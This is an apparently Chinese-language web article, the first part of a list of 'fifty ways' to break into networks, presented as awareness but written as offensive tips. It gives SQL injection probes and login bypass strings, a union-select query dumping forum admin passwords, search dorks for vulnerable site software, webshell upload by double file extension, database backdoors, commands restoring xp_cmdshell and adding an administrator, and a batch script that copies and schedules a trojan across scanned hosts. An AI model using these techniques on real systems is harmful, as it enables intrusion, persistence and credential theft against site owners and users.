******網絡的五十種方法(1)

現在網上的***事件越來越多,***都是通過什麼方法來***我們的呢?下面我們給大家總結了******網絡的五十種方法,讓大家做到有備無患。 
  1.網寬網絡有限公司製作的網站基本都有注入漏洞 搜索網寬網絡
  2.搜索欄裏輸入
  關鍵字%’and 1=1 and ’%’=’
  關鍵字%’and 1=2 and ’%’=’
  比較不同處 可以作爲注入的特徵字符
  3.登陸框用戶名和密碼輸入’or’=’or’ 漏洞很老但是現在很是遍地都是
  4.我們先到[url]www.google.com[/url]底下搜索一下co net mib ver 1.0
  密碼帳號都是 ’or’=’or’
  5.掛馬代碼
  6.[url]http://www.wyyfk.com/24[/url]小時掛QQ工具
  7.開啓regedt32的sam的管理員權限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被***過了,然後刪了guest帳號,對方可以用guest帳號使用administraeors的權限,你也可以用這方法留住肉雞,這方法是簡單克隆,
  net localgroup administrators還是可以看出guest是管理員來
  7.只要敢想,新浪也可*** 注入點
  微軟官方網站注入點
  8.ms05016***工具用法 mshta.exe test.hta 文件名.後綴名 可以綁上QQ大盜***
  9.有sa權限sqlserver數據庫、並且能sql注入支持fso+asp的服務器
  sql注入後,如何上傳***,
  10.QQ強制聊天代碼
  [url]http://wpa.qq.com/msgrd?v=1&uin[/url]=對方的QQ號&sITe=ioshenmue&menu=yes
  使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號後復 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他爲好友就能給 他發QQ消息。
  11. mybbs論壇cookie欺騙 後臺備份馬
  12.軟件instsrv.exe 把.exe文件做成系統服務來啓動 用來肉雞掛QQ等
  用法: 安裝: instsrv.exe 服務名稱 路徑
  卸載: instsrv.exe 服務名稱 remove
  13.以動網爲例數據庫查找dv_log,在上面的查詢的字段名裏選l_content後面的關鍵字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submIT=%cc%ed+%bc%d3 password2=01180017就是他的登陸密碼
  14.搜索的技巧 inurl:網址
  15.啓航工作室wms 5.0網站程序漏洞

  在baidu 搜索powered by: sailingstudio websITe manage system 5.0 (sp1)

  利用動畫[url]http://soft.77169.com/62/20050530/6824.html[/url]

  16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那麼我們要是把文件改成:ating.jpg.asp試試。。由於還是asp結尾,所以***不會變~

  17.天意商務系統網上依然有 有漏洞 網站具體的樣式[url]http://www.wzgcc.org/[/url]

  工具下載[url]www.hack6.com[/url]

  地址欄裏,填上天意商務系統的網址就可以了,注意一定要是主頁面

  18.sql注入時工具---internet選項---高級裏找到顯示友好的錯誤信息勾去掉

  不能注入時要第一時間想到%5c暴庫

  19.這個dbinbd.asp文件插入後門的功能適用於文件名爲.asp的所有access數據庫不是動網論壇也一樣可以使用的,後門隱蔽,幾乎發現不了

  工具使用方法動畫和所有文件

  [url]http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811[/url]

  20.缺少xp_cmdshell時

  嘗試恢復exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

  假如恢復不成功,可以嘗試直接加用戶(針對開3389的)

  declare @o int

  exec sp_oacreate ’wscript.shell’,@o out

  exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理員
21.批量種植***.bat 

  for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;複製***到掃描的計算機當中

  for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行***的時間

  掃描地址.txt裏每個主機名一行 用\\開頭

  22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址[url]www.hack6.com[/url]

  23.dv7.1用還原數據功能 還原asa***

  24.凡人網絡購物系統v6.0 可以%5c暴庫

  25.ipb2.0.2漏洞 構造語句

  $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基裏找 ipb<= 2.0.3論壇注入工具 [url]www.hack6.com[/url]下載
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章